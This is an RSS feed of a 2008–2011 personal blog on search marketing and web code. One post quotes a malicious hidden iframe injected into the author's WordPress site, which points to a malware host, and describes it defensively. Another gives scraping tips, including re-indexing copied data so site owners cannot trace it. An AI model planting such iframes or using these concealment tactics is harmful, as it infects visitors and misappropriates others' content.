<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dellanave &#187; SEM</title>
	<atom:link href="http://www.dellanave.com/blog/category/sem/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dellanave.com/blog</link>
	<description></description>
	<lastBuildDate>Tue, 29 Nov 2011 02:45:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
		<item>
		<title>How Not to Craft an Order Page</title>
		<link>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/</link>
		<comments>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/#comments</comments>
		<pubDate>Tue, 21 Jul 2009 20:17:34 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=289</guid>
		<description><![CDATA[I am not a User Interface designer by any means, but when I was confronted with this order page I immediately popped a blood vessel in my brain and stalled on what to do next. If you have an e-commerce site, and your order page looks like this, STOP.  Do not do ONE MORE THING [...]]]></description>
			<content:encoded><![CDATA[<p>I am not a User Interface designer by any means, but when I was confronted with this order page I immediately popped a blood vessel in my brain and stalled on what to do next.</p>
<p>If you have an e-commerce site, and your order page looks like this, STOP.  Do not do ONE MORE THING until you fix it.</p>
<p>Click to see a bigger version:</p>
<p><a href="http://www.dellanave.com/skitch//Tower_Hobbies_Express_Checkout-20090721-151718.jpg"><img src="http://www.dellanave.com/skitch//Tower_Hobbies_Express_Checkout-20090721-151609.jpg"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Split Test Your WordPress Theme (w/ Plugin)</title>
		<link>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/</link>
		<comments>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 21:12:35 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Haxor]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=271</guid>
		<description><![CDATA[Here is a rudimentary solution that allows you to split test all metrics on your WordPress blog.  If there is legitimate usage of this, I will make changes and improvements but at this point I am just throwing together a 15 minute SOLUTION not a complete idiot-proof package.  Please, give me feedback, I appreciate it.  [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a rudimentary solution that allows you to split test all metrics on your WordPress blog.  If there is legitimate usage of this, I will make changes and improvements but at this point I am just throwing together a 15 minute SOLUTION not a complete idiot-proof package.  Please, give me feedback, I appreciate it.  This was created in response to <a href="http://www.cindyalvarez.com/data-driven/how-to-ab-test-your-wordpress-blog">this</a>, so you can go there to read about why Google Website Optimizer is not the right solution for testing metrics across an entire site.</p>
<p><a title="Split Test WordPress Plugin" href="http://www.dellanave.com/blog/ddn_wp_splittest-0.2.zip">Download plugin.</a></p>
<p>First thing you need to do is create 2 theme folders.</p>
<p>theme1 is your original theme</p>
<p>theme2 contains the same theme, but with the changes you want to test</p>
<p>Set up 2 Google Analytics accounts.  This seems easiest to do with 2 different email addresses, and 2 browsers so that you can load both at the same time, and it doesn&#8217;t complain about the URL being the same.</p>
<ol>
<li>Open theme1/footer.php and insert the GA code from one account into the footer before the &lt;/body&gt; tag.</li>
<li>Open theme2/footer.php and insert the GA code from the other account into the footer before the &lt;/body&gt; tag.</li>
</ol>
<p>That&#8217;s about it.  The plugin drops a cookie in the visitor&#8217;s browser that records which theme to load for them.  If you want to completely change the themes, you can edit the plugin and change the cookie name to something new.  The cookie lasts for 30 days by default.</p>
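<p>To make the cookie logic concrete, here is a rough sketch in Python.  It is not the plugin&#8217;s code (the plugin is PHP and lives in the download above).  The cookie name <code>split_theme</code>, the function <code>pick_theme</code>, and the even random split between the two themes are assumptions made up for this illustration; only the two theme folder names and the 30-day lifetime come from the post.</p>

```python
import random

# Hypothetical names for illustration; the real plugin may use different ones.
COOKIE_NAME = "split_theme"
COOKIE_MAX_AGE = 30 * 24 * 60 * 60  # 30 days, in seconds
THEMES = ("theme1", "theme2")


def pick_theme(cookies, rng=random):
    """Return (theme, cookie_to_set).

    `cookies` is a dict of the cookies sent with the request.
    `cookie_to_set` is None when the visitor already has a valid assignment,
    otherwise a (name, value, max_age) tuple the caller should send back.
    """
    theme = cookies.get(COOKIE_NAME)
    if theme in THEMES:
        # Returning visitor: keep showing the theme they were assigned.
        return theme, None
    # New visitor (or stale/unknown value): assign one of the themes at random.
    theme = rng.choice(THEMES)
    return theme, (COOKIE_NAME, theme, COOKIE_MAX_AGE)
```

<p>With this shape, renaming <code>COOKIE_NAME</code> makes every existing cookie look unknown, so all visitors get assigned again, which is roughly the effect of changing the cookie name described above.</p>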
<p><strong>PS. </strong>I&#8217;m gonna admit right now that I almost always make mistakes the first time around.  If this doesn&#8217;t work for you &#8211; let me know.  If this doesn&#8217;t work for you and you figure out why &#8211; PLEASE hit me up and let me know so I can update this post.</p>
<p><strong>P.P.S</strong> This could be pretty easily made so much better, easier to install, easier to use, and more flexible.  We&#8217;ll see if the demand warrants it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>How to Get Rich Online</title>
		<link>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/</link>
		<comments>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/#comments</comments>
		<pubDate>Mon, 04 May 2009 15:23:47 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=231</guid>
		<description><![CDATA[Everyone wants a guide to get rich online. Here is a 5-step guide, with approximately how much time you should spend on each. 1. Pick a topic or niche and create a site about it. It doesn&#8217;t matter what it is. &#8211; 1% 2. Create a little bit of content. &#8211; 5% 3. Use twitter, [...]]]></description>
			<content:encoded><![CDATA[<p>Everyone wants a guide to get rich online.  Here is a 5-step guide, with approximately how much time you should spend on each.</p>
<ul>
<li>1. Pick a topic or niche and create a site about it.  It doesn&#8217;t matter what it is. &#8211; 1%</li>
<li>2. Create a little bit of content. &#8211; 5%</li>
<li>3. Use twitter, forums, link building, email and the telephone to connect with and build your community one user at a time.  &#8211; 90%</li>
<li>4. Create a little more content, and leverage your community that you have built to create more. &#8211; 4%</li>
<li>5. Get rich.</li>
</ul>
<p>You can thank me later.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Prevent, Protract, Process</title>
		<link>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/</link>
		<comments>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/#comments</comments>
		<pubDate>Wed, 28 Jan 2009 19:40:35 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Awesome]]></category>
		<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=196</guid>
		<description><![CDATA[I did a Google search for &#8220;chargeback guardian&#8221; the other day, and here&#8217;s what I saw: The irony of those title tags is beautiful. In case you don&#8217;t get it&#8230; Charge Back Guardian is a company that processes credit card payments and helps to prevent chargebacks. Presumably if you&#8217;re selling an iffy product you&#8217;d want [...]]]></description>
			<content:encoded><![CDATA[<p>I did a Google search for &#8220;chargeback guardian&#8221; the other day, and here&#8217;s what I saw:</p>
<p><img src="http://www.dellanave.com/skitch//ChargeBack_Guardian_-_Google_Search-20090128-133746.jpg"></p>
<p>The irony of those title tags is beautiful.  In case you don&#8217;t get it&#8230;</p>
<p>Charge Back Guardian is a company that processes credit card payments and helps to prevent chargebacks.  Presumably if you&#8217;re selling an iffy product you&#8217;d want to use these guys.  I have no problem with that.  But having &#8220;Protract&#8221; as a misspelling in their title is all too appropriate.</p>
<p>My guess is you wouldn&#8217;t want to get into a <i>protracted</i> battle with these guys to get your money back.</p>
<p>Oh, and the title on their main page is still misspelled, Protrect.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Semi-Comprehensive TLD Whois Response List</title>
		<link>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/</link>
		<comments>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/#comments</comments>
		<pubDate>Wed, 23 Jul 2008 17:50:58 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=158</guid>
		<description><![CDATA[For one of the coolest features of our Tools project I needed to be able to accurately determine domain availability. Here&#8217;s what I came up with: $domain_ext = array( '.com' => array('whois.crsnic.net','No match for'), '.net' => array('whois.crsnic.net','No match for'), '.biz' => array('whois.biz','Not found'), '.mobi' => array('whois.dotmobiregistry.net', 'NOT FOUND'), '.tv' => array('whois.nic.tv', 'No match for'), '.in' [...]]]></description>
			<content:encoded><![CDATA[<p>For one of the coolest features of our <a href="http://tools.shoemoney.com/">Tools</a> project I needed to be able to accurately determine domain availability.  Here&#8217;s what I came up with:</p>
<pre>
$domain_ext = array(
        '.com'          =&gt; array('whois.crsnic.net','No match for'),
        '.net'          =&gt; array('whois.crsnic.net','No match for'),
        '.biz'          =&gt; array('whois.biz','Not found'),
        '.mobi'         =&gt; array('whois.dotmobiregistry.net', 'NOT FOUND'),
        '.tv'           =&gt; array('whois.nic.tv', 'No match for'),
        '.in'           =&gt; array('whois.inregistry.net', 'NOT FOUND'),
        '.info'         =&gt; array('whois.afilias.net','NOT FOUND'),
        '.co.uk'        =&gt; array('whois.nic.uk','No match'),
        '.co.ug'        =&gt; array('wawa.eahd.or.ug','No entries found'),
        '.or.ug'        =&gt; array('wawa.eahd.or.ug','No entries found'),
        '.nl'           =&gt; array('whois.domain-registry.nl','is free'),
        '.ro'           =&gt; array('whois.rotld.ro','No entries found for the selected'),
        '.com.au'       =&gt; array('whois.ausregistry.net.au','No Data Found'),
        '.ca'           =&gt; array('whois.cira.ca', 'AVAIL'),
        '.org.uk'       =&gt; array('whois.nic.uk','No match'),
        '.name'         =&gt; array('whois.nic.name','No match'),
        '.us'           =&gt; array('whois.nic.us','Not found'),
        '.ac.ug'        =&gt; array('wawa.eahd.or.ug','No entries found'),
        '.ne.ug'        =&gt; array('wawa.eahd.or.ug','No entries found'),
        '.sc.ug'        =&gt; array('wawa.eahd.or.ug','No entries found'),
        '.ws'           =&gt; array('whois.website.ws','No Match'),
        '.be'           =&gt; array('whois.ripe.net','FREE'),
        '.com.cn'       =&gt; array('whois.cnnic.cn','no matching record'),
        '.net.cn'       =&gt; array('whois.cnnic.cn','no matching record'),
        '.org.cn'       =&gt; array('whois.cnnic.cn','no matching record'),
        '.no'           =&gt; array('whois.norid.no','no matches'),
        '.se'           =&gt; array('whois.nic-se.se','not found'),
        '.nu'           =&gt; array('whois.nic.nu','NO MATCH for'),
        '.com.tw'       =&gt; array('whois.twnic.net','No Found'),
        '.net.tw'       =&gt; array('whois.twnic.net','No Found'),
        '.org.tw'       =&gt; array('whois.twnic.net','No Found'),
        '.cc'           =&gt; array('whois.nic.cc','No match'),
        '.pl'           =&gt; array('whois.dns.pl','No information about'),
        '.pt'           =&gt; array('whois.dns.pt','no match'),
        '.org'          =&gt; array('whois.pir.org','NOT FOUND')
);
</pre>
<p>The second field is the string each server returns when the domain is not registered.  If I had time, I&#8217;d add a 3rd field which would be the response when the domain is NOT available.</p>
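<p>For anyone wondering how a table like this gets used, here is a minimal sketch.  It is written in Python rather than PHP purely for illustration, and it is not the code from the Tools project.  The names <code>WHOIS_SERVERS</code>, <code>split_domain</code>, <code>is_available</code>, <code>query_whois</code> and <code>check</code> are made up for this example, and only three rows of the list are copied over.  It assumes each server answers plain whois queries on TCP port 43 and that the marker string still appears in the reply for an unregistered domain, which may no longer hold for every registry.</p>

```python
import socket

# Three rows copied from the list above:
# suffix -> (whois server, marker returned when the domain is not registered).
WHOIS_SERVERS = {
    ".com": ("whois.crsnic.net", "No match for"),
    ".co.uk": ("whois.nic.uk", "No match"),
    ".org": ("whois.pir.org", "NOT FOUND"),
}


def split_domain(domain):
    """Return (name, suffix) using the longest matching suffix, or None."""
    domain = domain.lower()
    for suffix in sorted(WHOIS_SERVERS, key=len, reverse=True):
        if domain.endswith(suffix) and len(domain) > len(suffix):
            return domain[: -len(suffix)], suffix
    return None


def is_available(response, marker):
    """Treat the domain as available when the marker appears in the reply."""
    return marker.lower() in response.lower()


def query_whois(server, domain, timeout=10):
    """Send one whois query over TCP port 43 and return the raw reply text."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall((domain + "\r\n").encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def check(domain):
    """Look up the suffix, query its whois server, and test for the marker."""
    parts = split_domain(domain)
    if parts is None:
        raise ValueError("no whois server listed for " + domain)
    name, suffix = parts
    server, marker = WHOIS_SERVERS[suffix]
    return is_available(query_whois(server, domain), marker)
```

<p>Calling <code>check("example.com")</code> hits the live whois server, so expect rate limits if you loop over it.  The marker comparison is case-insensitive here because the markers in the list vary in case; that is a choice of this sketch, not something the list itself specifies.</p>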
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Soft Launch of Fighters.com, Finally</title>
		<link>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/</link>
		<comments>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 15:58:10 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/</guid>
		<description><![CDATA[It has been a long time in coming, but we&#8217;ve finally been able to soft-launch Fighters.com. The site is pretty web-1.0 right now and most of the content is site->user, but that will change soon. Check it out, let me know what you think. I know there will be bugs, but if you&#8217;re waiting to find [...]]]></description>
			<content:encoded><![CDATA[<p>It has been a long time in coming, but we&#8217;ve finally been able to soft-launch <a href="http://www.fighters.com/">Fighters.com</a>.  The site is pretty web-1.0 right now and most of the content is site->user, but that will change soon.</p>
<p>Check it out, let me know what you think.  I know there will be bugs, but if you&#8217;re waiting to find the last bug you&#8217;ll never launch.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nice Exploit Code I Found in my WordPress</title>
		<link>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/</link>
		<comments>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/#comments</comments>
		<pubDate>Mon, 10 Mar 2008 17:51:53 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/</guid>
		<description><![CDATA[I was going through some old posts just now, and discovered this little treat embedded in a post: &#60;!-- Traffic Statistics --&#62; &#60;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&#62;&#60;/iframe&#62; &#60;!-- End Traffic Statistics --&#62; The code that it&#8217;s loading (I know it doesn&#8217;t wrap, I don&#8217;t really care.) Code deleted. Thanks to Mike Peters for the follow-up [...]]]></description>
			<content:encoded><![CDATA[<p>I was going through some old posts just now, and discovered this little treat embedded in a post:</p>
<blockquote>
<pre><code>&lt;!-- Traffic Statistics --&gt;
&lt;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&gt;&lt;/iframe&gt;
&lt;!-- End Traffic Statistics --&gt;
</code></pre>
</blockquote>
<p>The code that it&#8217;s loading used to be posted here (unwrapped), but I have deleted it.  Thanks to <a href="http://www.softwareprojects.com/resources">Mike Peters</a> for the follow-up in the comments:</p>
<blockquote><p>
This code got sql injected into your wp_posts.</p>
<p>Make sure you upgrade to the 2.3.2 version of WordPress:</p>
<p>http://wordpress.org/support/topic/151888</p>
<p>What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.</p>
<p>Look for something like this in your server logs -</p>
<p>200.216.67.181 - - [28/Jan/2008:13:10:54 -0500] "POST /xmlrpc.php HTTP/1.0"</p>
<p>Once you view the post, you’re infected &#8211; the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up.</p>
</blockquote>
<p>Someone with more patience than myself will probably take the time to disassemble that.</p>
<p>To find the post titles in your blog that might be affected, in SQL do:</p>
<blockquote><p><code><br />
mysql> select post_title from wp_posts where post_content like '%Statistics%';<br />
</code></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>AdCenter Still Sucks</title>
		<link>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/</link>
		<comments>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/#comments</comments>
		<pubDate>Thu, 06 Mar 2008 17:55:44 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/</guid>
		<description><![CDATA[I haven&#8217;t had an active campaign running in 6 months or more. FIX YOUR SHIT.]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.dellanave.com/skitch/adcenter_still_sucks-20080306-115445.jpg"></p>
<p>I haven&#8217;t had an active campaign running in 6 months or more.  FIX YOUR SHIT.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How much would you pay to use Google?</title>
		<link>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/</link>
		<comments>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/#comments</comments>
		<pubDate>Tue, 29 Jan 2008 07:26:36 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Opinion]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/</guid>
		<description><![CDATA[I got to thinking about how much I use Google to answer questions the other day. My search activity calendar looks like this every month: Even between Jan 1-3 when I was in Vegas I did 1-3 searches. Some months are even heavier than this. So how much would I pay? I wouldn&#8217;t have [...]]]></description>
			<content:encoded><![CDATA[<p>I got to thinking about how much I use Google to answer questions the other day.  My search activity calendar looks like this every month:</p>
<p><center><br />
<img src="http://www.dellanave.com/skitch/Google_-_Web_History-20080129-012131.jpg"><br />
</center></p>
<p>Even between Jan 1-3 when I was in Vegas I did 1-3 searches.  Some months are even heavier than this.  So how much would I pay?  I wouldn&#8217;t have a problem with paying up to $1500/year to use Google.  Maybe even more if I had to.  It is THAT valuable to me.</p>
<p>How much would you pay to use Google?</p>
<p>P.S.  I think the search history is super freakin&#8217; cool.</p>
<blockquote><p><b>Update:</b> <a href="http://www.thatpamchick.com/2008/01/30/google-web-activity-calendar/">Pam</a> points out that the calendar is actually all web activity and not just search.  Touché.  That said, it doesn&#8217;t change how valuable I think Google is to me.  I&#8217;d still cough up the $1500.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Tips on Writing a Scraper</title>
		<link>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/</link>
		<comments>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/#comments</comments>
		<pubDate>Fri, 11 Jan 2008 19:23:29 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Haxor]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/</guid>
		<description><![CDATA[A couple weeks ago I got an email from a friend asking for some tips on writing a scraper. As I was responding, I realized it would make a good post. I think writing scrapers is one of my specialties, and I&#8217;ve yet to come across a site I haven&#8217;t been able to pillage. Here&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>A couple weeks ago I got an email from a friend asking for some tips on writing a scraper.  As I was responding, I realized it would make a good post.   I think writing scrapers is one of my specialties, and I&#8217;ve yet to come across a site I haven&#8217;t been able to pillage.</p>
<p>Here&#8217;s a few thoughts:</p>
<p>I like Perl a lot for scraping, but PHP works too.  Since scraping is kind of a rapid-prototype situation you should just use the tool you&#8217;re most comfortable with.  The nice part about Perl for scraping is all the available modules to do various data mangling, and the ability to multi-thread it.  I rarely write a scraper in PHP, but if you&#8217;re more comfortable with PHP by all means USE IT.</p>
<p>Scrape ALL THE DATA YOU CAN.  You might think you only want one little bit of data from a site.  Take everything you can and dump it into a database.  Look, you&#8217;re pulling the page anyway, you might as well save everything in case you need it later.  Dump everything into a database, and then pull out what you want from there into whatever you&#8217;re using it for.  You&#8217;ll never regret having the full dump, but you will regret not grabbing everything when you need another bit of data and you didn&#8217;t scrape it.</p>
<p>Be smart about re-indexing it.  Say you scrape somesite.com/id=123.  Don&#8217;t put it into your database with id=123.  Some day the site owner you ripped is going to notice all the IDs are the same and could use that against you.  Re-index it.  Going back to my previous point, keep THEIR ids in your database too, so that if you need to rip some more data you still have their keys intact.</p>
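<p>Here is one rough way the &#8220;dump everything, re-index it, keep their ids&#8221; advice could look in practice.  This is a sketch in Python with SQLite, not a recommendation of either; the table name <code>items</code>, the column names, and the functions <code>open_store</code> and <code>save_page</code> are all invented for this example.</p>

```python
import sqlite3


def open_store(path=":memory:"):
    """Open the database and create the table if it is missing.

    `id` is our own key (what we expose); `source_id` is the scraped
    site's key, kept privately so pages can be re-fetched later.
    """
    db = sqlite3.connect(path)
    db.execute(
        "CREATE TABLE IF NOT EXISTS items ("
        " id INTEGER PRIMARY KEY AUTOINCREMENT,"
        " source_id TEXT NOT NULL UNIQUE,"
        " raw_html TEXT NOT NULL)"
    )
    return db


def save_page(db, source_id, raw_html):
    """Store the full page and return our local id for it.

    A page seen before keeps its local id and has its stored HTML refreshed.
    """
    row = db.execute(
        "SELECT id FROM items WHERE source_id = ?", (source_id,)
    ).fetchone()
    if row is None:
        cur = db.execute(
            "INSERT INTO items (source_id, raw_html) VALUES (?, ?)",
            (source_id, raw_html),
        )
        local_id = cur.lastrowid
    else:
        local_id = row[0]
        db.execute(
            "UPDATE items SET raw_html = ? WHERE id = ?", (raw_html, local_id)
        )
    db.commit()
    return local_id
```

<p>Anything you publish would use the local <code>id</code>; the <code>source_id</code> column only exists so you can go back for more data later.</p>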
<p>A lot of people worry about rotating or proxying IPs when they&#8217;re scraping.  Don&#8217;t waste your time.  I&#8217;ve yet to find a site (other than Google) that will actually be aware enough to block you for scraping.  In the same vein, don&#8217;t piss-pound someone&#8217;s server when you&#8217;re scraping them.  Put a sleep(1) in for Christ&#8217;s sake.</p>
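<p>The sleep(1) advice boils down to a loop like the one below.  It is a bare-bones Python sketch; <code>fetch</code> and <code>scrape_politely</code> are names made up here, and the one-second default is just the number from the paragraph above, not a tuned value.</p>

```python
import time
import urllib.request


def fetch(url, timeout=30):
    """Download one URL and return the raw response body as bytes."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def scrape_politely(urls, fetch_page=fetch, delay=1.0, sleep=time.sleep):
    """Fetch each URL in order, pausing `delay` seconds between requests.

    `fetch_page` and `sleep` are parameters so the loop can be exercised
    without touching the network or actually waiting.
    """
    pages = {}
    for i, url in enumerate(urls):
        if i > 0:
            # Give the remote server a breather before the next request.
            sleep(delay)
        pages[url] = fetch_page(url)
    return pages
```

<p>There is no pause before the first request, only between requests, so a single-page scrape is not slowed down at all.</p>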
<p>Distributing your scraper?  That might make sense if you&#8217;re planning on spidering or scraping a lot of sites.  Use a common database and make sure your scrapers never cross paths.  Fetching the same page twice is a waste of your resources as well as those of the site you&#8217;re pillaging.</p>
<p>Don&#8217;t overthink or overcode it.  This is like anything else.  I&#8217;ve literally seen people spend a week writing a scraper with a million bells and whistles.  Just make it WORK and run it.</p>
<p>Be aware of cookies.  Sometimes you&#8217;ll want your scraper to happily accept cookies, other times you want to make sure it ignores them.  Depends on the site you&#8217;re scraping.  Be aware that some sites will have interstitials or other things that will mess with your scrape.  Cookies may or may not be a way around those ads.  Regardless, be aware of them and code accordingly.</p>
<p>Use Live HTTP Headers in Firefox if you&#8217;re struggling with understanding why you can access a site in a browser but your Perl script doesn&#8217;t get the same responses.</p>
<p>Don&#8217;t forget APIs.  Sometimes you don&#8217;t even need to scrape, you can pull the data with an API.  One time I wanted a database of like every CD ever made.  Amazon API for the win.</p>
<p>Finally, remember, if a browser can access it, you can scrape it.  If you can&#8217;t figure it out, you&#8217;re not trying hard enough.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

